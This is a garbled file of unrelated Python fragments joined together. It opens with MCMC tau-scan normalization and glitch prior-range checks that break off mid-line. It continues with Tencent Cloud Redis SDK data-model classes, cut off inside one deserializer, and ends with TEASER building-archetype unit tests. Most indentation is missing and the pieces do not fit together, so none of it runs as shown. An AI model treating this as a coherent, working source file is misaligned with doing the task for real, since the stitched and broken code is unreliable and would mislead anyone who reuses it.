print("f0_min: ", F0_list[0][0], 10**log_f0_min)
print("f0_max: ", F0_list[0][-1], 10**log_f0_max)
print("#"*70)
#normalization
norm = 0.0
for idx, TTT in enumerate(tau_scan):
for kk in range(TTT.shape[0]):
for ll in range(TTT.shape[1]):
df = np.log10(F0_list[idx][kk+1]/F0_list[idx][kk])
dt = (T0_list[idx][ll+1]-T0_list[idx][ll])/3600/24/365.25
dtau = (TAU_list[idx+1]-TAU_list[idx])
norm += TTT[kk,ll]*df*dt*dtau
tau_scan_data['norm'] = norm #TODO: Implement some check to make sure this is normalized over the same range as the prior range used in the MCMC
print(norm)
#read in glitch_tau_scan data if we will need it
if glitch_tau_scan_proposal_weight+glitch_RJ_weight>0:
if glitch_tau_scan_file==None:
raise Exception("glitch-tau-scan data file is needed for glitch model tau-scan global propsals")
with open(glitch_tau_scan_file, 'rb') as f:
glitch_tau_scan_data = pickle.load(f)
print("Glitch tau-scan data read in successfully!")
TAU_list = list(glitch_tau_scan_data['tau_edges'])
F0_list = glitch_tau_scan_data['f0_edges']
T0_list = glitch_tau_scan_data['t0_edges']
#check if same prior range was used
log_f0_max = float(ptas[-1][-1][-1].params[3]._typename.split('=')[2][:-1])
log_f0_min = float(ptas[-1][-1][-1].params[3]._typename.split('=')[1].split(',')[0])
t0_max = float(ptas[-1][-1][-1].params[8]._typename.split('=')[2][:-1])
t0_min = float(ptas[-1][-1][-1].params[8]._typename.split('=')[1].split(',')[0])
tau_max = float(ptas[-1][-1][-1].params[9]._typename.split('=')[2][:-1])
tau_min = float(ptas[-1][-1][-1].params[9]._typename.split('=')[1].split(',')[0])
print("#"*70)
print("Glitch tau--scan and MCMC prior range check (they must be the same)")
print("tau_min: ", TAU_list[0], tau_min)
print("tau_max: ", TAU_list[-1], tau_max)
print("t0_min: ", T0_list[0][0]/3600/24/365.25, t0_min)
print("t0_max: ", T0_list[0][-1]/3600/24/365.25, t0_max)
print("f0_min: ", F0_list[0][0], 10**log_f0_min)
print("f0_max: | |
        :type ParamName: str
        :param ValueType: Parameter type: integer
        :type ValueType: str
        :param NeedRestart: Whether a restart is required after modification: true, false
        :type NeedRestart: str
        :param DefaultValue: Default value of the parameter
        :type DefaultValue: str
        :param CurrentValue: Current running value of the parameter
        :type CurrentValue: str
        :param Tips: Parameter description
        :type Tips: str
        :param Min: Minimum value of the parameter
        :type Min: str
        :param Max: Maximum value of the parameter
        :type Max: str
        :param Status: Parameter status, 1: being modified, 2: modification finished
        :type Status: int
        :param Unit: Parameter unit
        Note: this field may return null, indicating that no valid value could be obtained.
        :type Unit: str
"""
self.ParamName = None
self.ValueType = None
self.NeedRestart = None
self.DefaultValue = None
self.CurrentValue = None
self.Tips = None
self.Min = None
self.Max = None
self.Status = None
self.Unit = None
def _deserialize(self, params):
self.ParamName = params.get("ParamName")
self.ValueType = params.get("ValueType")
self.NeedRestart = params.get("NeedRestart")
self.DefaultValue = params.get("DefaultValue")
self.CurrentValue = params.get("CurrentValue")
self.Tips = params.get("Tips")
self.Min = params.get("Min")
self.Max = params.get("Max")
self.Status = params.get("Status")
self.Unit = params.get("Unit")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set), Warning)
class InstanceMultiParam(AbstractModel):
"""实例多选项类型参数描述
"""
def __init__(self):
"""
        :param ParamName: Parameter name
        :type ParamName: str
        :param ValueType: Parameter type: multi
        :type ValueType: str
        :param NeedRestart: Whether a restart is required after modification: true, false
        :type NeedRestart: str
        :param DefaultValue: Default value of the parameter
        :type DefaultValue: str
        :param CurrentValue: Current running value of the parameter
        :type CurrentValue: str
        :param Tips: Parameter description
        :type Tips: str
        :param EnumValue: Enumerated values of the parameter
        :type EnumValue: list of str
        :param Status: Parameter status, 1: being modified, 2: modification finished
        :type Status: int
"""
self.ParamName = None
self.ValueType = None
self.NeedRestart = None
self.DefaultValue = None
self.CurrentValue = None
self.Tips = None
self.EnumValue = None
self.Status = None
def _deserialize(self, params):
self.ParamName = params.get("ParamName")
self.ValueType = params.get("ValueType")
self.NeedRestart = params.get("NeedRestart")
self.DefaultValue = params.get("DefaultValue")
self.CurrentValue = params.get("CurrentValue")
self.Tips = params.get("Tips")
self.EnumValue = params.get("EnumValue")
self.Status = params.get("Status")
member_set = set(params.keys())
for name, value in vars(self).items():
if name in member_set:
member_set.remove(name)
if len(member_set) > 0:
warnings.warn("%s fields are useless." % ",".join(member_set), Warning)
class InstanceNode(AbstractModel):
"""实例节点
"""
def __init__(self):
"""
:param Id: Id
:type Id: int
:param InstanceClusterNode: Detailed node information
:type InstanceClusterNode: list of InstanceClusterNode
"""
self.Id = None
self.InstanceClusterNode = None
def _deserialize(self, params):
self.Id = params.get("Id")
if params.get("InstanceClusterNode") is not None:
self.InstanceClusterNode = []
for item in params.get("InstanceClusterNode"):
obj = InstanceClusterNode()
obj._deserialize(item)
self.InstanceClusterNode.append(obj)
member_set = set(params.keys())
for name, value in vars(self).items():
if name in member_set:
member_set.remove(name)
if len(member_set) > 0:
warnings.warn("%s fields are useless." % ",".join(member_set), Warning)
class InstanceParam(AbstractModel):
"""实例参数
"""
def __init__(self):
"""
:param Key: Name of the parameter to set
:type Key: str
:param Value: Value of the parameter to set
:type Value: str
"""
self.Key = None
self.Value = None
def _deserialize(self, params):
self.Key = params.get("Key")
self.Value = params.get("Value")
member_set = set(params.keys())
for name, value in vars(self).items():
if name in member_set:
member_set.remove(name)
if len(member_set) > 0:
warnings.warn("%s fields are useless." % ",".join(member_set), Warning)
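# A hedged usage sketch of the shared _deserialize pattern (field values here
# are made up): keys that do not map to a declared attribute trigger the
# "fields are useless" warning emitted above.
# param = InstanceParam()
# param._deserialize({"Key": "maxmemory-policy", "Value": "allkeys-lru",
# "Unexpected": 1}) # warns: "Unexpected fields are useless."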
class InstanceParamHistory(AbstractModel):
"""实例参数修改历史
"""
def __init__(self):
"""
:param ParamName: Parameter name
:type ParamName: str
:param PreValue: Value before modification
:type PreValue: str
:param NewValue: Value after modification
:type NewValue: str
:param Status: Status. 1: parameter configuration being modified; 2: modification succeeded; 3: modification failed
:type Status: int
:param ModifyTime: Modification time
:type ModifyTime: str
"""
self.ParamName = None
self.PreValue = None
self.NewValue = None
self.Status = None
self.ModifyTime = None
def _deserialize(self, params):
self.ParamName = params.get("ParamName")
self.PreValue = params.get("PreValue")
self.NewValue = params.get("NewValue")
self.Status = params.get("Status")
self.ModifyTime = params.get("ModifyTime")
member_set = set(params.keys())
for name, value in vars(self).items():
if name in member_set:
member_set.remove(name)
if len(member_set) > 0:
warnings.warn("%s fields are useless." % ",".join(member_set), Warning)
class InstanceProxySlowlogDetail(AbstractModel):
"""代理慢查询详情
"""
def __init__(self):
"""
:param Duration: Slow query duration
:type Duration: int
:param Client: Client address
:type Client: str
:param Command: Command
:type Command: str
:param CommandLine: Full command line
:type CommandLine: str
:param ExecuteTime: Execution time
:type ExecuteTime: str
"""
self.Duration = None
self.Client = None
self.Command = None
self.CommandLine = None
self.ExecuteTime = None
def _deserialize(self, params):
self.Duration = params.get("Duration")
self.Client = params.get("Client")
self.Command = params.get("Command")
self.CommandLine = params.get("CommandLine")
self.ExecuteTime = params.get("ExecuteTime")
member_set = set(params.keys())
for name, value in vars(self).items():
if name in member_set:
member_set.remove(name)
if len(member_set) > 0:
warnings.warn("%s fields are useless." % ",".join(member_set), Warning)
class InstanceSecurityGroupDetail(AbstractModel):
"""实例安全组信息
"""
def __init__(self):
"""
:param InstanceId: Instance ID
:type InstanceId: str
:param SecurityGroupDetails: Security group information
:type SecurityGroupDetails: list of SecurityGroupDetail
"""
self.InstanceId = None
self.SecurityGroupDetails = None
def _deserialize(self, params):
self.InstanceId = params.get("InstanceId")
if params.get("SecurityGroupDetails") is not None:
self.SecurityGroupDetails = []
for item in params.get("SecurityGroupDetails"):
obj = SecurityGroupDetail()
obj._deserialize(item)
self.SecurityGroupDetails.append(obj)
member_set = set(params.keys())
for name, value in vars(self).items():
if name in member_set:
member_set.remove(name)
if len(member_set) > 0:
warnings.warn("%s fields are useless." % ",".join(member_set), Warning)
class InstanceSet(AbstractModel):
"""实例详细信息列表
"""
def __init__(self):
"""
:param InstanceName: Instance name
:type InstanceName: str
:param InstanceId: Instance ID
:type InstanceId: str
:param Appid: User's Appid
:type Appid: int
:param ProjectId: Project ID
:type ProjectId: int
:param RegionId: Region ID. 1: Guangzhou; 4: Shanghai; 5: Hong Kong (China); 6: Toronto; 7: Shanghai Finance; 8: Beijing; 9: Singapore; 11: Shenzhen Finance; 15: US West (Silicon Valley); 16: Chengdu; 17: Germany; 18: South Korea; 19: Chongqing; 21: India; 22: US East (Virginia); 23: Thailand; 24: Russia; 25: Japan
:type RegionId: int
:param ZoneId: Zone ID
:type ZoneId: int
:param VpcId: VPC ID, e.g. 75101
:type VpcId: int
:param SubnetId: Subnet ID under the VPC, e.g. 46315
:type SubnetId: int
:param Status: Current instance status. 0: to be initialized; 1: in process; 2: running; -2: isolated; -3: to be deleted
:type Status: int
:param WanIp: Instance VIP
:type WanIp: str
:param Port: Instance port number
:type Port: int
:param Createtime: Instance creation time
:type Createtime: str
:param Size: Instance capacity, in MB
:type Size: float
:param SizeUsed: This field is deprecated
:type SizeUsed: float
:param Type: Instance type. 1: Redis 2.8 memory edition (cluster architecture); 2: Redis 2.8 memory edition (standard architecture); 3: CKV 3.2 memory edition (standard architecture); 4: CKV 3.2 memory edition (cluster architecture); 5: Redis 2.8 memory edition (standalone); 6: Redis 4.0 memory edition (standard architecture); 7: Redis 4.0 memory edition (cluster architecture); 8: Redis 5.0 memory edition (standard architecture); 9: Redis 5.0 memory edition (cluster architecture)
:type Type: int
:param AutoRenewFlag: Whether auto-renewal is enabled. 1: auto-renewal enabled; 0: not enabled
:type AutoRenewFlag: int
:param DeadlineTime: Instance expiration time
:type DeadlineTime: str
:param Engine: Engine: community edition Redis or Tencent Cloud CKV
:type Engine: str
:param ProductType: Product type. standalone: standard edition; cluster: cluster edition
:type ProductType: str
:param UniqVpcId: Unique VPC ID, e.g. vpc-fk33jsf43kgv
:type UniqVpcId: str
:param UniqSubnetId: Unique subnet ID under the VPC, e.g. subnet-fd3j6l35mm0
:type UniqSubnetId: str
:param BillingMode: Billing mode. 0: pay-as-you-go; 1: monthly/yearly subscription
:type BillingMode: int
:param InstanceTitle: Description of the instance running status, e.g. "instance running"
:type InstanceTitle: str
:param OfflineTime: Scheduled deactivation time
:type OfflineTime: str
:param SubStatus: Sub-status returned for an instance in process
:type SubStatus: int
:param Tags: Anti-affinity tags
:type Tags: list of str
:param InstanceNode: Instance node information
:type InstanceNode: list of InstanceNode
:param RedisShardSize: Shard size
:type RedisShardSize: int
:param RedisShardNum: Number of shards
:type RedisShardNum: int
:param RedisReplicasNum: Number of replicas
:type RedisReplicasNum: int
:param PriceId: Billing ID
:type PriceId: int
:param CloseTime: Isolation time
:type CloseTime: str
:param SlaveReadWeight: Read weight of replica nodes
:type SlaveReadWeight: int
:param InstanceTags: Tag information associated with the instance
Note: this field may return null, indicating that no valid value could be obtained.
:type InstanceTags: list of InstanceTagInfo
:param ProjectName: Project name
Note: this field may return null, indicating that no valid value could be obtained.
:type ProjectName: str
:param NoAuth: Whether the instance is password-free. true: password-free; false: password-required
Note: this field may return null, indicating that no valid value could be obtained.
:type NoAuth: bool
:param ClientLimit: Number of client connections
Note: this field may return null, indicating that no valid value could be obtained.
:type ClientLimit: int
:param DtsStatus: DTS status (internal parameter; can be ignored by users)
Note: this field may return null, indicating that no valid value could be obtained.
:type DtsStatus: int
:param NetLimit: Upper bandwidth limit per shard, in MB
Note: this field may return null, indicating that no valid value could be obtained.
:type NetLimit: int
:param PasswordFree: Password-free instance flag (internal parameter; can be ignored by users)
Note: this field may return null, indicating that no valid value could be obtained.
:type PasswordFree: int
:param ReadOnly: Read-only instance flag (internal parameter; can be ignored by users)
Note: this field may return null, indicating that no valid value could be obtained.
:type ReadOnly: int
:param Vip6: Internal parameter; can be ignored by users
Note: this field may return null, indicating that no valid value could be obtained.
:type Vip6: str
:param RemainBandwidthDuration: Internal parameter; can be ignored by users
Note: this field may return null, indicating that no valid value could be obtained.
:type RemainBandwidthDuration: str
:param DiskSize: Disk size of Tendis instances
Note: this field may return null, indicating that no valid value could be obtained.
:type DiskSize: int
:param MonitorVersion: Monitoring version. 1m: minute-granularity monitoring; 5s: 5-second-granularity monitoring
Note: this field may return null, indicating that no valid value could be obtained.
:type MonitorVersion: str
:param ClientLimitMin: Minimum settable value of the maximum client connections
Note: this field may return null, indicating that no valid value could be obtained.
:type ClientLimitMin: int
:param ClientLimitMax: Maximum settable value of the maximum client connections
Note: this field may return null, indicating that no valid value could be obtained.
:type ClientLimitMax: int
:param NodeSet: Detailed node information of the instance
Note: this field may return null, indicating that no valid value could be obtained.
:type NodeSet: list of RedisNodeInfo
:param Region: Region of the instance, e.g. ap-guangzhou
Note: this field may return null, indicating that no valid value could be obtained.
:type Region: str
"""
self.InstanceName = None
self.InstanceId = None
self.Appid = None
self.ProjectId = None
self.RegionId = None
self.ZoneId = None
self.VpcId = None
self.SubnetId = None
self.Status = None
self.WanIp = None
self.Port = None
self.Createtime = None
self.Size = None
self.SizeUsed = None
self.Type = None
self.AutoRenewFlag = None
self.DeadlineTime = None
self.Engine = None
self.ProductType = None
self.UniqVpcId = None
self.UniqSubnetId = None
self.BillingMode = None
self.InstanceTitle = None
self.OfflineTime = None
self.SubStatus = None
self.Tags = None
self.InstanceNode = None
self.RedisShardSize = None
self.RedisShardNum = None
self.RedisReplicasNum = None
self.PriceId = None
self.CloseTime = None
self.SlaveReadWeight = None
self.InstanceTags = None
self.ProjectName = None
self.NoAuth = None
self.ClientLimit = None
self.DtsStatus = None
self.NetLimit = None
self.PasswordFree = None
self.ReadOnly = None
self.Vip6 = None
self.RemainBandwidthDuration = None
self.DiskSize = None
self.MonitorVersion = None
self.ClientLimitMin = None
self.ClientLimitMax = None
self.NodeSet = None
self.Region = None
def _deserialize(self, params):
self.InstanceName = params.get("InstanceName")
self.InstanceId = params.get("InstanceId")
self.Appid = params.get("Appid")
self.ProjectId = params.get("ProjectId")
self.RegionId = params.get("RegionId")
self.ZoneId = params.get("ZoneId")
self.VpcId = params.get("VpcId")
self.SubnetId = params.get("SubnetId")
self.Status = params.get("Status")
self.WanIp = params.get("WanIp")
self.Port = params.get("Port")
self.Createtime = params.get("Createtime")
self.Size = params.get("Size")
self.SizeUsed = params.get("SizeUsed")
self.Type = params.get("Type")
self.AutoRenewFlag = params.get("AutoRenewFlag")
self.DeadlineTime = params.get("DeadlineTime")
self.Engine = params.get("Engine")
self.ProductType = params.get("ProductType")
self.UniqVpcId = params.get("UniqVpcId")
self.UniqSubnetId = params.get("UniqSubnetId")
self.BillingMode = params.get("BillingMode")
self.InstanceTitle = params.get("InstanceTitle")
self.OfflineTime = params.get("OfflineTime")
self.SubStatus = params.get("SubStatus")
def test_type_bldg_residential_with_calc(self):
"""
Verification of the type building generation of a residential building.
Values are compared with TEASER3 values.
"""
from teaser.logic.archetypebuildings.bmvbs.singlefamilydwelling \
import SingleFamilyDwelling
prj.set_default()
test_residential = SingleFamilyDwelling(parent=prj,
name="TestBuilding",
year_of_construction=1988,
number_of_floors=3,
height_of_floors=3,
net_leased_area=2500)
test_residential.generate_archetype()
# general parameters
assert len(test_residential.thermal_zones) == 1
# zone specific parameters
for zone in test_residential.thermal_zones:
if zone.name == "SingleDwelling":
assert zone.area == 2500
# facade specific parameters
assert round(test_residential.get_outer_wall_area(-2), 0) == 1108
assert round(test_residential.get_outer_wall_area(-1), 0) == 1108
assert round(test_residential.get_outer_wall_area(0), 0) == 312
assert round(test_residential.get_outer_wall_area(180), 0) == 312
assert round(test_residential.get_outer_wall_area(90), 0) == 312
assert round(test_residential.get_outer_wall_area(270), 0) == 312
assert round(test_residential.get_window_area(0), 0) == 125
assert round(test_residential.get_window_area(180), 0) == 125
assert round(test_residential.get_window_area(90), 0) == 125
assert round(test_residential.get_window_area(270), 0) == 125
prj.set_default()
test_residential = SingleFamilyDwelling(parent=prj,
name="TestBuilding",
year_of_construction=1988,
number_of_floors=3,
height_of_floors=3,
net_leased_area=2500,
residential_layout=1,
neighbour_buildings=1,
attic=1,
dormer=1,
cellar=1,
construction_type="light")
test_residential.generate_archetype()
# facade specific parameters
assert round(test_residential.get_outer_wall_area(-2), 0) == 1108
assert round(test_residential.get_outer_wall_area(-1), 0) == 1108
assert round(test_residential.get_outer_wall_area(0), 0) == 393
assert round(test_residential.get_outer_wall_area(180), 0) == 393
assert round(test_residential.get_outer_wall_area(90), 0) == 393
assert round(test_residential.get_outer_wall_area(270), 0) == 393
assert round(test_residential.get_window_area(0), 0) == 125
assert round(test_residential.get_window_area(180), 0) == 125
assert round(test_residential.get_window_area(90), 0) == 125
assert round(test_residential.get_window_area(270), 0) == 125
prj.set_default()
test_residential = SingleFamilyDwelling(parent=prj,
name="TestBuilding",
year_of_construction=1988,
number_of_floors=3,
height_of_floors=3,
net_leased_area=2500,
residential_layout=0,
neighbour_buildings=2,
attic=2,
dormer=0,
cellar=2,
construction_type="heavy")
test_residential.generate_archetype()
# facade specific parameters
assert round(test_residential.get_outer_wall_area(-2), 0) == 858
assert round(test_residential.get_outer_wall_area(-1), 0) == 484
assert round(test_residential.get_outer_wall_area(0), 0) == 267
assert round(test_residential.get_outer_wall_area(180), 0) == 267
assert round(test_residential.get_outer_wall_area(90), 0) == 267
assert round(test_residential.get_outer_wall_area(270), 0) == 267
assert round(test_residential.get_window_area(0), 0) == 125
assert round(test_residential.get_window_area(180), 0) == 125
assert round(test_residential.get_window_area(90), 0) == 125
assert round(test_residential.get_window_area(270), 0) == 125
prj.set_default()
test_residential = SingleFamilyDwelling(parent=prj,
name="TestBuilding",
year_of_construction=1988,
number_of_floors=3,
height_of_floors=3,
net_leased_area=2500,
residential_layout=0,
neighbour_buildings=2,
attic=3,
dormer=0,
cellar=3,
construction_type="light")
test_residential.generate_archetype()
# facade specific parameters
assert round(test_residential.get_outer_wall_area(-2), 0) == 700
assert round(test_residential.get_outer_wall_area(-1), 0) == 789
assert round(test_residential.get_outer_wall_area(0), 0) == 251
assert round(test_residential.get_outer_wall_area(180), 0) == 251
assert round(test_residential.get_outer_wall_area(90), 0) == 251
assert round(test_residential.get_outer_wall_area(270), 0) == 251
assert round(test_residential.get_window_area(0), 0) == 125
assert round(test_residential.get_window_area(180), 0) == 125
assert round(test_residential.get_window_area(90), 0) == 125
assert round(test_residential.get_window_area(270), 0) == 125
# methods in Project, these tests only test if the API function works,
# not if it produces reliable results.
def test_load_save_project(self):
"""test of load_project and save_project"""
prj.load_project(utilities.get_full_path(("examples/examplefiles"
"/new.teaserXML")))
therm_zone = prj.buildings[-1].thermal_zones[0]
assert therm_zone.outer_walls[0].area == 40.0
tz_area = sum([tz.area for tz in prj.buildings[
-1].thermal_zones])
assert prj.buildings[-1].net_leased_area == tz_area
prj.save_project(file_name="unitTest", path=None)
prj.save_project(file_name=None, path=utilities.get_default_path())
prj.set_default()
def test_save_citygml(self):
"""test of save_gml"""
helptest.building_test2(prj)
prj.save_citygml(file_name="unitTest", path=None)
prj.save_citygml(file_name=None, path=utilities.get_default_path())
prj.set_default()
def test_load_citygml(self):
"""test of load_gml"""
prj.set_default()
prj.load_citygml(utilities.get_full_path(
"examples/examplefiles/CityGMLSample.gml"))
def test_calc_all_buildings(self):
"""test of calc_all_buildings, no calculation verification"""
helptest.building_test2(prj)
helptest.building_test2(prj)
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings(raise_errors=True)
def test_retrofit_all_buildings(self):
"""test of retrofit_all_buildings, no calculation verification"""
prj.add_residential(
method='iwu',
usage='single_family_dwelling',
name="ResidentialBuilding",
year_of_construction=1858,
number_of_floors=2,
height_of_floors=3.2,
net_leased_area=219)
prj.add_residential(
method='tabula_de',
usage='single_family_house',
name="ResidentialBuilding",
year_of_construction=1858,
number_of_floors=2,
height_of_floors=3.2,
net_leased_area=219)
prj.retrofit_all_buildings(
year_of_retrofit=2015,
type_of_retrofit='retrofit')
def test_export_aixlib(self):
"""test of export_aixlib, no calculation verification"""
prj.number_of_elements_calc = 1
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib()
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib()
prj.number_of_elements_calc = 3
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib(building_model="Test",
zone_model="Test",
corG="Test")
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.buildings.append(prj.buildings[-1])
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib(path=utilities.get_default_path())
def test_export_ibpsa(self):
"""test of export_ibpsa, no calculation verification"""
prj.number_of_elements_calc = 1
prj.merge_windows_calc = True
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 1
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 2
prj.merge_windows_calc = True
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 3
prj.merge_windows_calc = True
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 3
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 4
prj.merge_windows_calc = True
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(internal_id=prj.buildings[-1].internal_id)
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(path=utilities.get_default_path())
prj.set_default()
def test_export_parameters_txt(self):
"""test of the export of the readable parameter output"""
helptest.building_test2(prj)
prj.number_of_elements_calc = 1
prj.merge_windows_calc = True
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 1
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 2
prj.merge_windows_calc = True
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 3
prj.merge_windows_calc = True
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 3
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = True
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt(path=utilities.get_default_path())
prj.set_default()
def test_instantiate_data_class(self):
"""test of instantiate_data_class"""
prj.instantiate_data_class()
def test_type_bldg_office(self):
"""test of type_bldg_office, no calculation verification
"""
prj.set_default(load_data=True)
prj.type_bldg_office(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
office_layout=0,
window_layout=0,
construction_type="heavy")
prj.add_non_residential(
method='bmvbs',
usage='office',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
office_layout=0,
window_layout=0,
construction_type="heavy")
def test_type_bldg_institute(self):
"""test of type_bldg_institute, no calculation verification"""
prj.type_bldg_institute(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
office_layout=0,
window_layout=0,
construction_type="heavy")
prj.add_non_residential(
method='bmvbs',
usage='institute',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=True,
office_layout=0,
window_layout=0,
construction_type="heavy")
def test_type_bldg_institute4(self):
"""test of type_bldg_institute4, no calculation verification"""
prj.type_bldg_institute4(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
office_layout=0,
window_layout=0,
construction_type="heavy")
prj.add_non_residential(
method='bmvbs',
usage='institute4',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=True,
office_layout=0,
window_layout=0,
construction_type="heavy")
def test_type_bldg_institute8(self):
"""test of type_bldg_institute8, no calculation verification"""
prj.type_bldg_institute8(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
office_layout=0,
window_layout=0,
construction_type="heavy")
prj.add_non_residential(
method='bmvbs',
usage='institute8',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=True,
office_layout=0,
window_layout=0,
construction_type="heavy")
def test_type_bldg_residential(self):
"""test of type_bldg_residential, no calculation verification"""
prj.type_bldg_residential(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy")
prj.add_residential(
method='iwu',
usage='single_family_dwelling',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy")
def test_est_bldgs(self):
"""test of type_bldg_est, no calculation verification"""
prj.type_bldg_est1a(
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
neighbour_buildings=None,
construction_type=None)
prj.add_residential(
method='urbanrenet',
usage='est1a',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.type_bldg_est1b(
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
neighbour_buildings=None,
construction_type=None,
number_of_apartments=2)
prj.add_residential(
method='urbanrenet',
usage='est1b',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est2',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est3',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
